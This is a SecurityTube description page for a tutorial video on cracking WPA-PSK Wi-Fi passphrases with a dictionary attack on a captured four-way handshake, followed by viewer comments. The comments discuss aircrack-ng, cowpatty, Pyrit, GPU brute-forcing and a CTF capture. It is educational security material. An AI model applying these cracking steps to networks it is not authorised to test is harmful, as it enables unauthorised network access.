Description: Welcome to Part 22 of the WLAN Security Megaprimer! Please start this series by watching Part 1 http://www.securitytube.net/video/1756, if you have not done so already.
In this video, we will look at how to crack WPA-PSK using a Dictionary attack. An attacker can quietly observe the 4 way handshake and saves these packets. He now has access to the SNonce, ANonce, Supplicant MAC, and Authenticator MAC. Along with this he also has access to the MIC which was signed using the PTK.
The only unknown is the passphrase which can be anywhere between 8-63 characters. This is where the Dictionary attack comes in! We will use a wordlist with which we will try and guess the passphrase. This will be done by calculating the PMK with the guessed passphrase, then calculating the PTK with the help of the other data from the handshake and then finally verifying the MIC in the handshake. If it matches, we have a winner! else, we try the next phrase.
Look forward to your comments!
Tags: wpa-psk , wireless , wifi , security , megaprimer , pbkdf , ptk , pmk , anonce , snonce ,
Excellent video Vivek! Finally WPA! the whole grail of WiFi Hackin :)
Great work as always Dear Vivek, many thanks
Magic! Very clear explanation and demonstration. Thank you so much for your time Vivek. A good cup of ginger tea has got you firing on all cylinders again :-)
These have got to be the best tutorials on the web! As far as BT5 goes I agree with you. I am one of those people having a great deal of trouble getting everything working properly. Sometimes it works, most of the time it doesn't. It is baffling! For now, as a student, I am sticking with BT4R2.
first off thanks a million for all the videos u have posted. for my great luck I found this site specially when my college advance project is based on, finding methods of cracking wireless access points and then trying to secure them.i was having a hard time understanding the encryption methods of WEP but then u posted the tutorial. and now I'm one step closer to complete my project. thanks and waiting for the next video......
Clear and concise Vivek, as usual! I know that it's possible to crack WPA-PSK without having captured all four packets of the handshake but, as you demonstrated in the last video, it's not guaranteed that all four are captured. I did some reading around this and some suggested using tcpdump. I also saw a comment about whether the fact that you're using BT4 in a VM might affect the capture of all four packets.
I realise it's academic but it's good to be able to capture all four in order to step through them in Wireshark and analyse exactly what fields are where and how their values change. I had a bit of a hard time getting my hands on the exact document that you used in your previous presentation listing the contents of the handshake packets, until I saw a file open (802.11i-2004.pdf) at page 87 on your desktop. Then it was easy!
Finally, you made me chuckle in the final few minutes. You always ask for comments and suggestions. I was going to ask about an explanation about TKIP and CCMP. I realise that the former is related to RC4 and the latter related to AES and details are not mandatory for what you're demonstrating. It was almost as if you read my mind when I was contemplating asking about them!
Keep up the good work. Your enthusiasm is infectious!
Another great Video Vivek
i wanted to know will it be possible to crack the WPA packet by brute-forcing it, i have seen such a video some where, which used cowpatty and a NVidia graphics card
just curious.....
thanks again specially for taking time for students like me
Vivek:
I have been passivly running airodump-ng/WICD at several locations and It amazes me how many people are still using WEP. I reside in the St louis, Mo area. I see 25-40% of APs using WEP.
"Like drunk dialing is a crime" "WEP kills" <grin>
I have a thought for a future "MegaPriner"! How about a sequel to Assembly MEGA Priner by a basic intro to IDA Pro free? Or even IPV6 ie.... the Nexdt Header!
Brute force dictionary creator
http://www.governmentsecurity.org/forum/index.php?s=31995aa88d150024766714748c124d5b&app=core&module=attach§ion=attach&attach_id=1843
un-tested
Thanks a lot Vivek for another excellent video.
Thanks Vivek, keep those videos coming!
Very good stuff!
Thanks Vivek, Yet another exelent video. no_covers: Even an extremely fast system can only achieve about 100k keys/sec which makes brute forcing a WPA key pretty pointless for full character set passwords with lengths above five characters. On the other hand there are some exelent tools you can use with a dictionary and GPU to speed things up like Pyrit. One option is to do a pass-through mode through coWPatty. The great thing about this is that you can run it with your dictionary file and not mess around with making a rainbow table. Another great tool is ocl where you can apend a rule to the dictionary. :)
Dear Mr.Vivek ,
You are the best teacher i have come across.
Your teaching is so simple and up to date ,that even a beginner can follow.
i am truly speechless .
I know this is a suggestion page , but , please help me !
I am using backtrack4 on my macbook pro running oracle virtual box same one running in your videos , however when i switch to full screen mode the default resolution of 800*600 stays , thus making the screen ver small
im really sorry to post this question but please help me , as i have searched a lot but have not found an answer.
Awaiting your speedy reply,
Thanks:)
You will need to add the virtual box guest additions in order to take full advantage of the features. Check the vbox documentation.
@utkarsh_shah http://www.backtrack-linux.org/forums/beginners-forum/35185-backtrack-4r2-virtualbox-guest-additions.html
wicked. thanks again bro !
Just a couple quick points. You can use John the Ripper to pipe into aircrack all possibilities (starting at 8 characters long of course). It might take forever but it will find it. Two, remembering a really long passphrase isn't really that difficult. Almost everyone has a favorite song that they know the lyrics to or they can use a piece of literature.
Consider this password:
"4score&7yearsAgo0urFathersBroughtForth0nThisContinentANewNation".
66 characters and still easy to remember.
i7-Cud4 How long do you estimate it would take to brute 8 - 20 chars?
so you are saying All of the u238 would be PbII oxide before you found the phrase!
http://www.garykessler.net/library/password.html
Thats at 1 million keys/second.
wpa you get from 800 keys/s - 100k max
This news is a little old but with the exponential increase in processing speed, GPU speed and SSD, how long do you think it will be before passwords become obsolete altogether?
https://www.infosecisland.com/blogview/9023-Cracking-14-Character-Complex-Passwords-in-5-Seconds.html
You asked in the video about bactrack 5 and the Alfa card - Well mine works perfectly. ps. Your a great teacher
WCNA -- this would ne nice to verify "...9023-Cracking-14-Character-Complex-Passwords-in-5-Seconds.html" eg third party...
@m0ei thanks a ton really appreciate the help :)
@WCNA - good points about JTR and GPU/SSD. Maybe we can persuade Vivek to do something about brute forcing? I guess that as WPA becomes used more widely, either larger dictionaries will be required or increasingly efficient methods of brute forcing.
My wireless at home has WPA with a >20 character passphrase including UC/LC/SC and numbers so I figure the chances of someone getting the passphrase are very low ... unless his name happens to be Vivek!
@no cover said "this would ne nice to verify"
Objectif Sécurité has a demo on their page as a proof of concept you can try. I grabbed a NTLM hash for a simple word 'HELLO' and it cracked it in a few seconds. Try it out and let us know what you find (read their limitations...after all they're trying to sell a product).
@John-Nash, Globalization, Chard, m0ei, MamboYoyo, utkarsh_shah, allisonmagicelite, no_covers, Wavelength Thanks Guys! :) Great to see so many people still hanging around :)
@Blackmarketeer I miss my Ginger tea, need to make a trip to the supermarket
@william I can't have that uncertainty :)
@silentkiller good to know the videos are helping out! Any encryption or signature based validation schema can be bruteforced. Its just a question of how much time it will take to do it.
@Ignatius The 4-way handshake is a pain, only yesterday I was cracking a network (legally :) ) and I found all 4 pkts, I almost cried :) Yes, AES, TKIP everything will be covered for sure :)
@no_covers Same here and my prediction is that till the time the AP ships with WEP, WEP will remain alive! It will never go away.
@i7-Cud4 Your nick indicates you are a GPU kinda guy :)
@utkarsh_shah I guess @m0ei answered your query
@WCNA, Ignatius I agree with you totally. Though I still feel we are years before everyone will use such passphrases. I could write some code to create a bruteforcing engine, will work on it once I am back to India next month from Belgium
Thanks for all the support guys :)
Next video has been posted: http://www.securitytube.net/video/1911
Yes sir , Mr.M0ei answered my query.
thanks @m0ei.
Sir i would like to tell you only one thing!
Never stop making your videos.As whatever knowledge i have gained is from you.
Take care and have a great stay at Belgium.
thanks WCNA i will check that out soon as time permits!!
Sir you are an Awesome teacher.. :D
Hello everybody,
I am trying to crack the password from a pcap file that has been created for a "capture the flag" competition. But aircrack-ng couldn't find any from the password list which is in bt5. Please note that pcap file does not contain all keys for 3-way handshake, only two of them.
I generated a hash file with genpmk utility and tried with cowpatty. But this time it gives me the following error.
======================
cowpatty 4.6 - WPA-PSK dictionary attack.
End of pcap capture file, incomplete four-way handshake exchange. Try using a different capture.
======================
Do you have any suggestions about what to do next ?
PS: I have no doubt Vivek will point me into the right direction. :-)
Thanks,
Orhan
vivek, i definitely enjoy watching your videos. I'm new to this and you teach it in a way where someone as myself could understand it. I don't mind listening when you teach the theory because its easy to digest and informative at the same time. just keep doing what your doing. i'm following you.. thank you..
Tony_Stark
Hello Vivek, After running airodump-ng --bssid <> --channel 1 --write <filename>
beacons are coming but not the data, what will be the problem, the beacon count is 14000 but no data. I am not sure where i am missing,
I request you all to reply on this and suggest the best command so that i can through with the data and can initiate a wpa handshake then.
Great !
thank my master